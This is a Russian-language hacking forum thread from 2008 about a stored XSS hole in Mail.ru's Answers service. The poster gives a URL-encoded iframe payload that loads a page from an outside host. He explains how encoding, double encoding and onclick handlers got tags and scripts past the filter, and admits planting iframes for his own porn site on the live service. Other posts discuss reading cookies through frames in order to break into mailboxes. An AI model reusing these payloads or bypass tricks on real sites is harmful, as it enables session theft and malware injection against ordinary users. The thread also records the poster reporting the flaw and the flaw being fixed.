PDA

Просмотр полной версии : Уязвимость на Ответах Мейлру

попугай
13.02.2008, 17:22
Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru

В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы...
и соответственно любой вредоносный код...

примеры здесь



примеры (http://otvet.mail.ru/question/12960827/)
примеры (http://otvet.mail.ru/question/12960139/)
примеры (http://otvet.mail.ru/question/12960279/)
А также были фреймы с моим порносайтом .. но их удалили :D :D :D :mad: :mad:


Собственно -рассказываю как )))

все теги фильтруются и обрезаются...
с этим не поспоришь -майловцы молодцы )))

Но они упустили кое что
если теги заурленкодить Можно здесь (http://grandcasino.jino-net.ru/urlen.php)

То они на мейлру уже декодируются а дальше не фильтруются!!!!
и в итоге получаем .... хехех ... попробую на ачате )))
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод..

%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E
вот такая загогулина... и ее постим в каментах или в вопросе...
и получаем фрейм.. также можно любые теги....
кроме <script>

Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))
попугай
13.02.2008, 18:58
http://otvet.mail.ru/question/12964134/
попугай
13.02.2008, 19:18
Я только не очень силен в яваскрипте.... но можно ведь как то получить доступ через фрейм к родительскому окну ?
попугай
13.02.2008, 19:44
Жаль скрипты все таки фильтируются
попугай
14.02.2008, 03:26
скрпты тоже можно писать !!!!
Опять же урленкодим....

таким образом...
<input type=button onclick=скрипт произвольный>

одно но... кавычки заслешиваются... так что серьезного ничего не сделать.... :( :(

PS // хмм... и кавычки можно обойти ))
попугай
14.02.2008, 21:23
Таак... Скрипты в виде <script> </script>
тоже можно писать -требуется двойное урленкодирование

Однако главная проблема -почему нельзя передать куки на скрипт .. -это то , что
ссылки фильтруются -то есть
если есть http -то перед ним ставятся теги <noindex> , <nofollow>
и которые портят код .
Если у кого есить идеи -выкладывайте
попугай
15.02.2008, 05:55
X) X)
Все уязвимости прикрыли X)
ZET36
23.02.2008, 05:29
во первых зря то сообщил админам маила
во вторых зря что выложил баг в паблик этоже активна хсс в маил ру
получить доступ к 1вому фрэйму (где авторизованные куки) через родительское окно в джаваскрипт можно так


parent.имя фрэйма.document.cookie


если бы не ступил то мог бы беспалива хакать мыльники
попугай
05.04.2008, 02:16
parent.имя фрэйма.document.cookie

нельзя так... Да я и пробовал
это разные домены - и получить доступ из одного домена в другой нельзя

PS да может и зря... конечно...но гражданский долг меня позвал )))
Qwazar
05.04.2008, 03:28
Вместо 'http://' можешь писать просто '//'
попугай
05.04.2008, 06:50
Вместо 'http://' можешь писать просто '//'

Нет ..это относительная ссылка считается... и ссылка будет вида

http://otvet.mail.ru//hacker.ru

Да и что сейчас обсуждать? Все равно уязвимость прикрыли....

Может в следующем году снова облажаются)) Как в этом... (год назад эта уязвимость была-потом прикрыли , а в этом году снова появилась))) )